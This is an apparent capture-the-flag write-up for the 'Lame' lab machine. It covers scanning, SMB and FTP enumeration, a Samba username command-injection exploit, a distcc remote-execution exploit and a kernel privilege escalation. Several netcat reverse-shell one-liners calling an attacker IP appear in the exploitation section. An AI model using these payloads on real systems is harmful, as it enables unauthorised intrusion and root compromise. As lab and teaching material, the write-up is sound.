Lame Writeup

Reconnaissance

Initial Nmap Scan to find open ports, using treat all hosts as online (-Pn)

nmap -Pn 10.10.10.3

Nmap Scan on all ports (including UDP) so that we do not miss any ports that did not show up in the initial scan

Nmap Scan for service version (-sV) running default nmap scripts (-sC) enumerating ports 21, 22, 139, 445 (-p) and saving it into a file called nmap (-oN).

nmap -sC -sV -p 21,22,139,445 -oN nmap 10.10.10.3

Enumeration

Port 21: FTP; vsftpd 2.3.4

First thing to do is to search this version on google and look for knows exploits

The first link is a Metasploit tutorial on how to exploit it, but we are doing it without Metasploit so lets click the second link.

Now, we can copy this exploit or we can search it up on searchsploit and copy it to our directory there.

searchsploit vsftpd 2.3.4

Now lets copy the exploit to our directory

searchsploit -m unix/remote/49757.py

I tried exploiting this using the python exploit we found, but it constantly showed a time out error, which means that the exploit is probably is outdated and does not work anymore.

Next thing to do is to enumerate the Anonymous FTP login allowed we found on our nmap scan

Let us login

Username: anonymous

Password: anonymous

Lets list what the ftp server contains

and ….. nothing , well, at least we tried. 😉

Port 22 OpenSSH 4.7p1

Searching on google does not give us something interesting. And usually we cannot exploit port 22, we only use it to ssh into the machine after we find the username or password from other ports or if we find a id_rsa file.

Port 139 and 445 Samba

Usually we find exploits on ports 139 and 445 which are Samba ports, so let us enumerate these ports

smbclient is a very common tool used to enumerate Samba ports, so let us use smbclient to access the SMB server.

smbclient -L 10.10.10.3 # "-L" lists what services are available 

Now let us look at the permission on the share drives (this can be done with the -H flag)

smbmap -H 10.10.10.3

Looking at this , we can see that we have Read and Write permissions for the tmp Disk on the Smb server. Lets go look for vulnerabilities on this version, and code execution ones as we have write permissions on a share.

After searching for a while I found a exploit that looks like the one we want. CVE-2007-2447

Reading through the exploit, we can understand that we are able to execute arbitrary commands via shell metacharacters. Lets search this on exploit-db and look at the code.

username = "/=`nohup " + payload.encoded + "`"

This line tells us that we can add our payload in the "payload.encoded" space and it will work, we can try adding a simple Netcat reverse shell and get a reverse shell.

Port 3632 distcc v1

Let us go to google.com and try finding some information on this

Google says that this service is vulnerable to a remote code execution vulnerability and we can use a nmap script that will give us more information.

Exploitation

Samba

Lets start a Netcat listener on our machine

nc -nvlp 1234

Now let us login into the smb client that we found while enumerating

smbclient //10.10.10.3

Now we have to send the shell metacharacters as input into the username parameter with a reverse shell payload to get a reverse shell on our machine.

We can find a good reverse shell on pentestmonkey's reverse shell cheat sheet. Replace the ip with yours, you can find your ip with this command.

ifconfig 

It is the number next to inet under tun0 (make sure you are connected to the OpenVPN).

Now let us add our payload in the username parameter

logon "/=`nohup rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.19 1234 >/tmp/f -e /bin/sh`"

"logon" is the command used for logging into a user within smbclient

After clicking enter, you should get a reverse shell on your reverse shell listener

And we are root :), Go get both those flags.

Distcc

In the enumeration part we found out that the service is vulnerable to CVE-2004-2687 and we found a nmap script that can be used to exploit this vulnerability.

nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='id'"

This is the nmap command, we can see that we try running a reverse shell instead of 'id' and try getting a reverse shell.

nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f -e /bin/sh'"

Lets start a Netcat reverse shell listener and wait for a connection after entering this command

And we get a reverse shell, but as a user :/, time to privilege escalate and get root

Lets look at the OS version and look for exploits

uname -a

After a lot of searching I found an exploit that might work, lets copy it form searchsploit

Now we have to transfer it to the victim machine, we can do this by starting a python http server and using "wget" on the victim machine to get the file.

We can see that it transferred successfully, now we have to compile the .c file using gcc and change the name to exploit

gcc 8572.c -o exploit

Now we have to run this, to do this we have to look at the instruction they gave us when we found this exploit.

Now first we have to find the PID of the udevd netlink socket, to do this we can use this command

ps -aux | grep devd

And now we have to subtract one from the PID which will 2740

Now we have to create a file called run in the /tmp folder and add a payload in it, which will be our reverse shell.

First we need to add

#!/bin/bash 

to the file as then it can recognize that it is a bash script

echo '#!/bin/bash' > run
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.19 1234 >/tmp/f' >> run

After this , start a listener on your machine and run the exploit with the PID - 1

./exploit 2740

After this you should have root :)